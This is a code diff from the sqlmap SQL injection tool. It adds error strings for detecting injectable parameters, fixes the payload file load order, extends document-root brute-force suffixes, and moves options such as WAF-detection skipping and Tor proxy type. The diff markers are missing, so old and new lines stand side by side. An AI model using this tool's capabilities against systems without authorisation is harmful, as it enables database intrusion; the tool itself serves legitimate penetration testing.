CHECK_ZERO_COLUMNS_THRESHOLD = 10
|
||||
|
||||
# Boldify all logger messages containing these "patterns"
|
||||
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CloudFlare")
|
||||
BOLD_PATTERNS = ("' injectable", "provided empty", "leftover chars", "might be injectable", "' is vulnerable", "is not injectable", "test failed", "test passed", "live test final result", "test shows that", "the back-end DBMS is", "created Github", "blocked by the target server", "protection is involved", "CAPTCHA")
|
||||
|
||||
# Generic www root directory names
|
||||
GENERIC_DOC_ROOT_DIRECTORY_NAMES = ("htdocs", "httpdocs", "public", "wwwroot", "www")
|
||||
@@ -591,7 +616,7 @@ MAX_HELP_OPTION_LENGTH = 18
|
||||
MAX_CONNECT_RETRIES = 100
|
||||
|
||||
# Strings for detecting formatting errors
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Failed to convert", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal")
|
||||
FORMAT_EXCEPTION_STRINGS = ("Type mismatch", "Error converting", "Conversion failed", "String or binary data would be truncated", "Failed to convert", "unable to interpret text value", "Input string was not in a correct format", "System.FormatException", "java.lang.NumberFormatException", "ValueError: invalid literal", "DataTypeMismatchException", "CF_SQL_INTEGER", " for CFSQLTYPE ", "cfqueryparam cfsqltype", "InvalidParamTypeException", "Invalid parameter type", "is not of type numeric", "<cfif Not IsNumeric(", "invalid input syntax for integer", "invalid input syntax for type", "invalid number", "character to number conversion error", "unable to interpret text value", "String was not recognized as a valid", "Convert.ToInt", "cannot be converted to a ", "InvalidDataException")
|
||||
|
||||
# Regular expression used for extracting ASP.NET view state values
|
||||
VIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^"]*)[^>]+value="(?P<result>[^"]+)'
|
||||
@@ -641,6 +666,9 @@ SUHOSIN_MAX_VALUE_LENGTH = 512
|
||||
# Minimum size of an (binary) entry before it can be considered for dumping to disk
|
||||
MIN_BINARY_DISK_DUMP_SIZE = 100
|
||||
|
||||
# Filenames of payloads xml files (in order of loading)
|
||||
PAYLOAD_XML_FILES = ("boolean_blind.xml", "error_based.xml", "inline_query.xml", "stacked_queries.xml", "time_blind.xml", "union_query.xml")
|
||||
|
||||
# Regular expression used for extracting form tags
|
||||
FORM_SEARCH_REGEX = r"(?si)<form(?!.+<form).+?</form>"
|
||||
|
||||
@@ -672,7 +700,7 @@ BRUTE_DOC_ROOT_PREFIXES = {
|
||||
}
|
||||
|
||||
# Suffixes used in brute force search for web server document root
|
||||
BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "data", "sites/all", "www/build")
|
||||
BRUTE_DOC_ROOT_SUFFIXES = ("", "html", "htdocs", "httpdocs", "php", "public", "src", "site", "build", "web", "www", "data", "sites/all", "www/build")
|
||||
|
||||
# String used for marking target name inside used brute force web server document root
|
||||
BRUTE_DOC_ROOT_TARGET_MARK = "%TARGET%"
|
||||
|
||||
@@ -21,6 +21,7 @@ from lib.core.common import intersect
|
||||
from lib.core.common import normalizeUnicode
|
||||
from lib.core.common import openFile
|
||||
from lib.core.common import paramToDict
|
||||
from lib.core.common import randomStr
|
||||
from lib.core.common import readInput
|
||||
from lib.core.common import resetCookieJar
|
||||
from lib.core.common import urldecode
|
||||
@@ -35,6 +36,7 @@ from lib.core.dump import dumper
|
||||
from lib.core.enums import HASHDB_KEYS
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.enums import HTTPMETHOD
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.enums import POST_HINT
|
||||
from lib.core.exception import SqlmapFilePathException
|
||||
@@ -214,9 +216,9 @@ def _setRequestParams():
|
||||
|
||||
if re.search(URI_INJECTABLE_REGEX, conf.url, re.I) and not any(place in conf.parameters for place in (PLACE.GET, PLACE.POST)) and not kb.postHint and not CUSTOM_INJECTION_MARK_CHAR in (conf.data or "") and conf.url.startswith("http"):
|
||||
warnMsg = "you've provided target URL without any GET "
|
||||
warnMsg += "parameters (e.g. www.site.com/article.php?id=1) "
|
||||
warnMsg += "parameters (e.g. 'http://www.site.com/article.php?id=1') "
|
||||
warnMsg += "and without providing any POST parameters "
|
||||
warnMsg += "through --data option"
|
||||
warnMsg += "through option '--data'"
|
||||
logger.warn(warnMsg)
|
||||
|
||||
message = "do you want to try URI injections "
|
||||
@@ -370,7 +372,7 @@ def _setRequestParams():
|
||||
raise SqlmapGenericException(errMsg)
|
||||
|
||||
if conf.csrfToken:
|
||||
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||
if not any(conf.csrfToken in _ for _ in (conf.paramDict.get(PLACE.GET, {}), conf.paramDict.get(PLACE.POST, {}))) and not re.search(r"\b%s\b" % re.escape(conf.csrfToken), conf.data or "") and not conf.csrfToken in set(_[0].lower() for _ in conf.httpHeaders) and not conf.csrfToken in conf.paramDict.get(PLACE.COOKIE, {}):
|
||||
errMsg = "anti-CSRF token parameter '%s' not " % conf.csrfToken
|
||||
errMsg += "found in provided GET, POST, Cookie or header values"
|
||||
raise SqlmapGenericException(errMsg)
|
||||
@@ -451,7 +453,7 @@ def _resumeDBMS():
|
||||
dbms = value.lower()
|
||||
dbmsVersion = [UNKNOWN_DBMS_VERSION]
|
||||
_ = "(%s)" % ("|".join([alias for alias in SUPPORTED_DBMS]))
|
||||
_ = re.search("%s ([\d\.]+)" % _, dbms, re.I)
|
||||
_ = re.search(r"\A%s (.*)" % _, dbms, re.I)
|
||||
|
||||
if _:
|
||||
dbms = _.group(1).lower()
|
||||
@@ -531,7 +533,7 @@ def _setResultsFile():
|
||||
except (OSError, IOError), ex:
|
||||
try:
|
||||
warnMsg = "unable to create results file '%s' ('%s'). " % (conf.resultsFilename, getUnicode(ex))
|
||||
conf.resultsFilename = tempfile.mkstemp(prefix="sqlmapresults-", suffix=".csv")[1]
|
||||
conf.resultsFilename = tempfile.mkstemp(prefix=MKSTEMP_PREFIX.RESULTS, suffix=".csv")[1]
|
||||
conf.resultsFP = openFile(conf.resultsFilename, "w+", UNICODE_ENCODING, buffering=0)
|
||||
warnMsg += "Using temporary file '%s' instead" % conf.resultsFilename
|
||||
logger.warn(warnMsg)
|
||||
@@ -542,7 +544,7 @@ def _setResultsFile():
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
conf.resultsFP.writelines("Target URL,Place,Parameter,Techniques%s" % os.linesep)
|
||||
conf.resultsFP.writelines("Target URL,Place,Parameter,Technique(s),Note(s)%s" % os.linesep)
|
||||
|
||||
logger.info("using '%s' as the CSV results file in multiple targets mode" % conf.resultsFilename)
|
||||
|
||||
@@ -603,28 +605,33 @@ def _createTargetDirs():
|
||||
Create the output directory.
|
||||
"""
|
||||
|
||||
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
||||
try:
|
||||
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
||||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
||||
try:
|
||||
if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH):
|
||||
os.makedirs(paths.SQLMAP_OUTPUT_PATH, 0755)
|
||||
|
||||
_ = os.path.join(paths.SQLMAP_OUTPUT_PATH, randomStr())
|
||||
open(_, "w+b").close()
|
||||
os.remove(_)
|
||||
|
||||
if conf.outputDir:
|
||||
warnMsg = "using '%s' as the output directory" % paths.SQLMAP_OUTPUT_PATH
|
||||
logger.warn(warnMsg)
|
||||
except (OSError, IOError), ex:
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except Exception, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapSystemException(errMsg)
|
||||
except (OSError, IOError), ex:
|
||||
try:
|
||||
tempDir = tempfile.mkdtemp(prefix="sqlmapoutput")
|
||||
except Exception, _:
|
||||
errMsg = "unable to write to the temporary directory ('%s'). " % _
|
||||
errMsg += "Please make sure that your disk is not full and "
|
||||
errMsg += "that you have sufficient write permissions to "
|
||||
errMsg += "create temporary files and/or directories"
|
||||
raise SqlmapSystemException(errMsg)
|
||||
|
||||
warnMsg = "unable to create regular output directory "
|
||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
|
||||
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||
logger.warn(warnMsg)
|
||||
warnMsg = "unable to %s output directory " % ("create" if not os.path.isdir(paths.SQLMAP_OUTPUT_PATH) else "write to the")
|
||||
warnMsg += "'%s' (%s). " % (paths.SQLMAP_OUTPUT_PATH, getUnicode(ex))
|
||||
warnMsg += "Using temporary directory '%s' instead" % getUnicode(tempDir)
|
||||
logger.warn(warnMsg)
|
||||
|
||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
||||
paths.SQLMAP_OUTPUT_PATH = tempDir
|
||||
|
||||
conf.outputPath = os.path.join(getUnicode(paths.SQLMAP_OUTPUT_PATH), normalizeUnicode(getUnicode(conf.hostname)))
|
||||
|
||||
|
||||
@@ -25,6 +25,7 @@ from lib.core.common import readXmlFile
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import logger
|
||||
from lib.core.data import paths
|
||||
from lib.core.enums import MKSTEMP_PREFIX
|
||||
from lib.core.exception import SqlmapBaseException
|
||||
from lib.core.exception import SqlmapNotVulnerableException
|
||||
from lib.core.log import LOGGER_HANDLER
|
||||
@@ -235,7 +236,7 @@ def initCase(switches, count):
|
||||
Failures.failedParseOn = None
|
||||
Failures.failedTraceBack = None
|
||||
|
||||
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="sqlmaptest-%d-" % count)
|
||||
paths.SQLMAP_OUTPUT_PATH = tempfile.mkdtemp(prefix="%s%d-" % (MKSTEMP_PREFIX.TESTING, count))
|
||||
paths.SQLMAP_DUMP_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "dump")
|
||||
paths.SQLMAP_FILES_PATH = os.path.join(paths.SQLMAP_OUTPUT_PATH, "%s", "files")
|
||||
|
||||
|
||||
@@ -6,6 +6,7 @@ See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import difflib
|
||||
import random
|
||||
import threading
|
||||
import time
|
||||
import traceback
|
||||
@@ -43,6 +44,7 @@ class _ThreadData(threading.local):
|
||||
self.inTransaction = False
|
||||
self.lastComparisonPage = None
|
||||
self.lastComparisonHeaders = None
|
||||
self.lastComparisonCode = None
|
||||
self.lastErrorPage = None
|
||||
self.lastHTTPError = None
|
||||
self.lastRedirectMsg = None
|
||||
@@ -51,6 +53,7 @@ class _ThreadData(threading.local):
|
||||
self.lastRequestMsg = None
|
||||
self.lastRequestUID = 0
|
||||
self.lastRedirectURL = None
|
||||
self.random = random.WichmannHill()
|
||||
self.resumed = False
|
||||
self.retriesCount = 0
|
||||
self.seqMatcher = difflib.SequenceMatcher(None)
|
||||
@@ -199,8 +202,11 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
|
||||
kb.threadException = False
|
||||
|
||||
for lock in kb.locks.values():
|
||||
if lock.locked_lock():
|
||||
lock.release()
|
||||
if lock.locked():
|
||||
try:
|
||||
lock.release()
|
||||
except thread.error:
|
||||
pass
|
||||
|
||||
if conf.get("hashDB"):
|
||||
conf.hashDB.flush(True)
|
||||
|
||||
@@ -5,6 +5,7 @@ Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
|
||||
See the file 'doc/COPYING' for copying permission
|
||||
"""
|
||||
|
||||
import locale
|
||||
import os
|
||||
import re
|
||||
import time
|
||||
@@ -43,7 +44,7 @@ def update():
|
||||
dataToStdout("\r[%s] [INFO] update in progress " % time.strftime("%X"))
|
||||
|
||||
try:
|
||||
process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH)
|
||||
process = execute("git checkout . && git pull %s HEAD" % GIT_REPOSITORY, shell=True, stdout=PIPE, stderr=PIPE, cwd=paths.SQLMAP_ROOT_PATH.encode(locale.getpreferredencoding())) # Reference: http://blog.stastnarodina.com/honza-en/spot/python-unicodeencodeerror/
|
||||
pollProcess(process, True)
|
||||
stdout, stderr = process.communicate()
|
||||
success = not process.returncode
|
||||
|
||||
@@ -11,7 +11,6 @@ import zipfile
|
||||
from lib.core.common import getSafeExString
|
||||
from lib.core.exception import SqlmapDataException
|
||||
from lib.core.exception import SqlmapInstallationException
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
|
||||
class Wordlist(object):
|
||||
"""
|
||||
@@ -45,7 +44,7 @@ class Wordlist(object):
|
||||
try:
|
||||
_ = zipfile.ZipFile(self.current, 'r')
|
||||
except zipfile.error, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg = "something appears to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
@@ -71,7 +70,7 @@ class Wordlist(object):
|
||||
try:
|
||||
retVal = self.iter.next().rstrip()
|
||||
except zipfile.error, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg = "something appears to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (self.current, getSafeExString(ex))
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
|
||||
@@ -17,6 +17,7 @@ from optparse import SUPPRESS_HELP
|
||||
|
||||
from lib.core.common import checkDeprecatedOptions
|
||||
from lib.core.common import checkSystemEncoding
|
||||
from lib.core.common import dataToStdout
|
||||
from lib.core.common import expandMnemonics
|
||||
from lib.core.common import getUnicode
|
||||
from lib.core.data import cmdLineOptions
|
||||
@@ -30,6 +31,7 @@ from lib.core.settings import BASIC_HELP_ITEMS
|
||||
from lib.core.settings import DUMMY_URL
|
||||
from lib.core.settings import IS_WIN
|
||||
from lib.core.settings import MAX_HELP_OPTION_LENGTH
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.settings import VERSION_STRING
|
||||
from lib.core.shell import autoCompletion
|
||||
from lib.core.shell import clearHistory
|
||||
@@ -46,7 +48,7 @@ def cmdLineParser(argv=None):
|
||||
|
||||
checkSystemEncoding()
|
||||
|
||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding())
|
||||
_ = getUnicode(os.path.basename(argv[0]), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
|
||||
|
||||
usage = "%s%s [options]" % ("python " if not IS_WIN else "", \
|
||||
"\"%s\"" % _ if " " in _ else _)
|
||||
@@ -171,7 +173,7 @@ def cmdLineParser(argv=None):
|
||||
help="Set Tor proxy port other than default")
|
||||
|
||||
request.add_option("--tor-type", dest="torType",
|
||||
help="Set Tor proxy type (HTTP (default), SOCKS4 or SOCKS5)")
|
||||
help="Set Tor proxy type (HTTP, SOCKS4 or SOCKS5 (default))")
|
||||
|
||||
request.add_option("--check-tor", dest="checkTor",
|
||||
action="store_true",
|
||||
@@ -464,6 +466,9 @@ def cmdLineParser(argv=None):
|
||||
help="Exclude DBMS system databases when "
|
||||
"enumerating tables")
|
||||
|
||||
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
||||
help="Pivot column name")
|
||||
|
||||
enumeration.add_option("--where", dest="dumpWhere",
|
||||
help="Use WHERE condition while table dumping")
|
||||
|
||||
@@ -617,6 +622,9 @@ def cmdLineParser(argv=None):
|
||||
action="store_true",
|
||||
help="Never ask for user input, use the default behaviour")
|
||||
|
||||
general.add_option("--binary-fields", dest="binaryFields",
|
||||
help="Result fields having binary values (e.g. \"digest\")")
|
||||
|
||||
general.add_option("--charset", dest="charset",
|
||||
help="Force character encoding used for data retrieval")
|
||||
|
||||
@@ -662,9 +670,6 @@ def cmdLineParser(argv=None):
|
||||
action="store_true",
|
||||
help="Parse and display DBMS error messages from responses")
|
||||
|
||||
general.add_option("--pivot-column", dest="pivotColumn",
|
||||
help="Pivot column name")
|
||||
|
||||
general.add_option("--save", dest="saveConfig",
|
||||
help="Save options to a configuration INI file")
|
||||
|
||||
@@ -716,10 +721,6 @@ def cmdLineParser(argv=None):
|
||||
action="store_true",
|
||||
help="Make a thorough testing for a WAF/IPS/IDS protection")
|
||||
|
||||
miscellaneous.add_option("--skip-waf", dest="skipWaf",
|
||||
action="store_true",
|
||||
help="Skip heuristic detection of WAF/IPS/IDS protection")
|
||||
|
||||
miscellaneous.add_option("--mobile", dest="mobile",
|
||||
action="store_true",
|
||||
help="Imitate smartphone through HTTP User-Agent header")
|
||||
@@ -736,12 +737,19 @@ def cmdLineParser(argv=None):
|
||||
action="store_true",
|
||||
help="Safely remove all content from output directory")
|
||||
|
||||
miscellaneous.add_option("--skip-waf", dest="skipWaf",
|
||||
action="store_true",
|
||||
help="Skip heuristic detection of WAF/IPS/IDS protection")
|
||||
|
||||
miscellaneous.add_option("--smart", dest="smart",
|
||||
action="store_true",
|
||||
help="Conduct thorough tests only if positive heuristic(s)")
|
||||
|
||||
miscellaneous.add_option("--sqlmap-shell", dest="sqlmapShell", action="store_true",
|
||||
help="Prompt for an interactive sqlmap shell")
|
||||
help="Prompt for an interactive sqlmap shell")
|
||||
|
||||
miscellaneous.add_option("--tmp-dir", dest="tmpDir",
|
||||
help="Local directory for storing temporary files")
|
||||
|
||||
miscellaneous.add_option("--wizard", dest="wizard",
|
||||
action="store_true",
|
||||
@@ -760,12 +768,6 @@ def cmdLineParser(argv=None):
|
||||
parser.add_option("--profile", dest="profile", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--binary-fields", dest="binaryFields",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--cpu-throttle", dest="cpuThrottle", type="int",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
parser.add_option("--force-dns", dest="forceDns", action="store_true",
|
||||
help=SUPPRESS_HELP)
|
||||
|
||||
@@ -809,12 +811,12 @@ def cmdLineParser(argv=None):
|
||||
parser.formatter._format_option_strings = parser.formatter.format_option_strings
|
||||
parser.formatter.format_option_strings = type(parser.formatter.format_option_strings)(_, parser, type(parser))
|
||||
|
||||
# Dirty hack for making a short option -hh
|
||||
# Dirty hack for making a short option '-hh'
|
||||
option = parser.get_option("--hh")
|
||||
option._short_opts = ["-hh"]
|
||||
option._long_opts = []
|
||||
|
||||
# Dirty hack for inherent help message of switch -h
|
||||
# Dirty hack for inherent help message of switch '-h'
|
||||
option = parser.get_option("-h")
|
||||
option.help = option.help.capitalize().replace("this help", "basic help")
|
||||
|
||||
@@ -824,7 +826,7 @@ def cmdLineParser(argv=None):
|
||||
extraHeaders = []
|
||||
|
||||
for arg in argv:
|
||||
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding()))
|
||||
_.append(getUnicode(arg, encoding=sys.getfilesystemencoding() or UNICODE_ENCODING))
|
||||
|
||||
argv = _
|
||||
checkDeprecatedOptions(argv)
|
||||
@@ -862,13 +864,13 @@ def cmdLineParser(argv=None):
|
||||
continue
|
||||
elif command.lower() == "clear":
|
||||
clearHistory()
|
||||
print "[i] history cleared"
|
||||
dataToStdout("[i] history cleared\n")
|
||||
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||
elif command.lower() in ("x", "q", "exit", "quit"):
|
||||
raise SqlmapShellQuitException
|
||||
elif command[0] != '-':
|
||||
print "[!] invalid option(s) provided"
|
||||
print "[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'"
|
||||
dataToStdout("[!] invalid option(s) provided\n")
|
||||
dataToStdout("[i] proper example: '-u http://www.site.com/vuln.php?id=1 --banner'\n")
|
||||
else:
|
||||
saveHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||
loadHistory(AUTOCOMPLETE_TYPE.SQLMAP)
|
||||
@@ -885,7 +887,8 @@ def cmdLineParser(argv=None):
|
||||
if argv[i] == "-hh":
|
||||
argv[i] = "-h"
|
||||
elif re.search(r"\A-\w=.+", argv[i]):
|
||||
print "[!] potentially miswritten (illegal '=') short option detected ('%s')" % argv[i]
|
||||
dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i])
|
||||
raise SystemExit
|
||||
elif argv[i] == "-H":
|
||||
if i + 1 < len(argv):
|
||||
extraHeaders.append(argv[i + 1])
|
||||
@@ -910,11 +913,11 @@ def cmdLineParser(argv=None):
|
||||
try:
|
||||
(args, _) = parser.parse_args(argv)
|
||||
except UnicodeEncodeError, ex:
|
||||
print "\n[!] %s" % ex.object.encode("unicode-escape")
|
||||
dataToStdout("\n[!] %s\n" % ex.object.encode("unicode-escape"))
|
||||
raise SystemExit
|
||||
except SystemExit:
|
||||
if "-h" in argv and not advancedHelp:
|
||||
print "\n[!] to see full list of options run with '-hh'"
|
||||
dataToStdout("\n[!] to see full list of options run with '-hh'\n")
|
||||
raise
|
||||
|
||||
if extraHeaders:
|
||||
@@ -935,7 +938,7 @@ def cmdLineParser(argv=None):
|
||||
args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, \
|
||||
args.purgeOutput, args.pickledOptions, args.sitemapUrl)):
|
||||
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), "
|
||||
errMsg += "use -h for basic or -hh for advanced help"
|
||||
errMsg += "use -h for basic or -hh for advanced help\n"
|
||||
parser.error(errMsg)
|
||||
|
||||
return args
|
||||
@@ -946,7 +949,7 @@ def cmdLineParser(argv=None):
|
||||
except SystemExit:
|
||||
# Protection against Windows dummy double clicking
|
||||
if IS_WIN:
|
||||
print "\nPress Enter to continue...",
|
||||
dataToStdout("\nPress Enter to continue...")
|
||||
raw_input()
|
||||
raise
|
||||
|
||||
|
||||
@@ -24,7 +24,8 @@ class HTMLHandler(ContentHandler):
|
||||
ContentHandler.__init__(self)
|
||||
|
||||
self._dbms = None
|
||||
self._page = page
|
||||
self._page = (page or "")
|
||||
self._lower_page = self._page.lower()
|
||||
|
||||
self.dbms = None
|
||||
|
||||
@@ -33,11 +34,20 @@ class HTMLHandler(ContentHandler):
|
||||
threadData.lastErrorPage = (threadData.lastRequestUID, self._page)
|
||||
|
||||
def startElement(self, name, attrs):
|
||||
if self.dbms:
|
||||
return
|
||||
|
||||
if name == "dbms":
|
||||
self._dbms = attrs.get("value")
|
||||
|
||||
elif name == "error":
|
||||
if re.search(attrs.get("regexp"), self._page, re.I):
|
||||
regexp = attrs.get("regexp")
|
||||
if regexp not in kb.cache.regex:
|
||||
keywords = re.findall("\w+", re.sub(r"\\.", " ", regexp))
|
||||
keywords = sorted(keywords, key=len)
|
||||
kb.cache.regex[regexp] = keywords[-1].lower()
|
||||
|
||||
if kb.cache.regex[regexp] in self._lower_page and re.search(regexp, self._page, re.I):
|
||||
self.dbms = self._dbms
|
||||
self._markAsErrorPage()
|
||||
|
||||
|
||||
@@ -14,6 +14,7 @@ from lib.core.data import conf
|
||||
from lib.core.data import paths
|
||||
from lib.core.datatype import AttribDict
|
||||
from lib.core.exception import SqlmapInstallationException
|
||||
from lib.core.settings import PAYLOAD_XML_FILES
|
||||
|
||||
def cleanupVals(text, tag):
|
||||
if tag in ("clause", "where"):
|
||||
@@ -74,7 +75,7 @@ def loadBoundaries():
|
||||
try:
|
||||
doc = et.parse(paths.BOUNDARIES_XML)
|
||||
except Exception, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg = "something appears to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, getSafeExString(ex))
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
@@ -83,16 +84,13 @@ def loadBoundaries():
|
||||
parseXmlNode(root)
|
||||
|
||||
def loadPayloads():
|
||||
payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
|
||||
payloadFiles.sort()
|
||||
|
||||
for payloadFile in payloadFiles:
|
||||
for payloadFile in PAYLOAD_XML_FILES:
|
||||
payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
|
||||
|
||||
try:
|
||||
doc = et.parse(payloadFilePath)
|
||||
except Exception, ex:
|
||||
errMsg = "something seems to be wrong with "
|
||||
errMsg = "something appears to be wrong with "
|
||||
errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, getSafeExString(ex))
|
||||
errMsg += "sure that you haven't made any changes to it"
|
||||
raise SqlmapInstallationException, errMsg
|
||||
|
||||
@@ -13,6 +13,7 @@ import StringIO
|
||||
import struct
|
||||
import zlib
|
||||
|
||||
from lib.core.common import Backend
|
||||
from lib.core.common import extractErrorMessage
|
||||
from lib.core.common import extractRegexResult
|
||||
from lib.core.common import getPublicTypeMembers
|
||||
@@ -25,6 +26,7 @@ from lib.core.common import singleTimeWarnMessage
|
||||
from lib.core.data import conf
|
||||
from lib.core.data import kb
|
||||
from lib.core.data import logger
|
||||
from lib.core.enums import DBMS
|
||||
from lib.core.enums import HTTP_HEADER
|
||||
from lib.core.enums import PLACE
|
||||
from lib.core.exception import SqlmapCompressionException
|
||||
@@ -34,6 +36,7 @@ from lib.core.settings import EVENTVALIDATION_REGEX
|
||||
from lib.core.settings import MAX_CONNECTION_TOTAL_SIZE
|
||||
from lib.core.settings import META_CHARSET_REGEX
|
||||
from lib.core.settings import PARSE_HEADERS_LIMIT
|
||||
from lib.core.settings import SELECT_FROM_TABLE_REGEX
|
||||
from lib.core.settings import UNICODE_ENCODING
|
||||
from lib.core.settings import VIEWSTATE_REGEX
|
||||
from lib.parse.headers import headersParser
|
||||
@@ -91,7 +94,7 @@ def forgeHeaders(items=None):
|
||||
if cookie.domain_specified and not conf.hostname.endswith(cookie.domain):
|
||||
continue
|
||||
|
||||
if ("%s=" % cookie.name) in headers[HTTP_HEADER.COOKIE]:
|
||||
if ("%s=" % getUnicode(cookie.name)) in headers[HTTP_HEADER.COOKIE]:
|
||||
if conf.loadCookies:
|
||||
conf.httpHeaders = filter(None, ((item if item[0] != HTTP_HEADER.COOKIE else None) for item in conf.httpHeaders))
|
||||
elif kb.mergeCookies is None:
|
||||
@@ -103,7 +106,7 @@ def forgeHeaders(items=None):
|
||||
kb.mergeCookies = not _ or _[0] in ("y", "Y")
|
||||
|
||||
if kb.mergeCookies and kb.injection.place != PLACE.COOKIE:
|
||||
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(cookie.name), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (cookie.name, getUnicode(cookie.value))).replace('\\', r'\\'), x)
|
||||
_ = lambda x: re.sub(r"(?i)\b%s=[^%s]+" % (re.escape(getUnicode(cookie.name)), conf.cookieDel or DEFAULT_COOKIE_DELIMITER), ("%s=%s" % (getUnicode(cookie.name), getUnicode(cookie.value))).replace('\\', r'\\'), x)
|
||||
headers[HTTP_HEADER.COOKIE] = _(headers[HTTP_HEADER.COOKIE])
|
||||
|
||||
if PLACE.COOKIE in conf.parameters:
|
||||
@@ -112,7 +115,7 @@ def forgeHeaders(items=None):
|
||||
conf.httpHeaders = [(item[0], item[1] if item[0] != HTTP_HEADER.COOKIE else _(item[1])) for item in conf.httpHeaders]
|
||||
|
||||
elif not kb.testMode:
|
||||
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, cookie.name, getUnicode(cookie.value))
|
||||
headers[HTTP_HEADER.COOKIE] += "%s %s=%s" % (conf.cookieDel or DEFAULT_COOKIE_DELIMITER, getUnicode(cookie.name), getUnicode(cookie.value))
|
||||
|
||||
if kb.testMode and not any((conf.csrfToken, conf.safeUrl)):
|
||||
resetCookieJar(conf.cj)
|
||||
@@ -150,7 +153,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||
return encoding
|
||||
|
||||
# Reference: http://www.destructor.de/charsets/index.htm
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932"}
|
||||
translate = {"windows-874": "iso-8859-11", "utf-8859-1": "utf8", "en_us": "utf8", "macintosh": "iso-8859-1", "euc_tw": "big5_tw", "th": "tis-620", "unicode": "utf8", "utc8": "utf8", "ebcdic": "ebcdic-cp-be", "iso-8859": "iso8859-1", "ansi": "ascii", "gbk2312": "gbk", "windows-31j": "cp932", "en": "us"}
|
||||
|
||||
for delimiter in (';', ',', '('):
|
||||
if delimiter in encoding:
|
||||
@@ -204,7 +207,7 @@ def checkCharEncoding(encoding, warn=True):
|
||||
# Reference: http://docs.python.org/library/codecs.html
|
||||
try:
|
||||
codecs.lookup(encoding.encode(UNICODE_ENCODING) if isinstance(encoding, unicode) else encoding)
|
||||
except LookupError:
|
||||
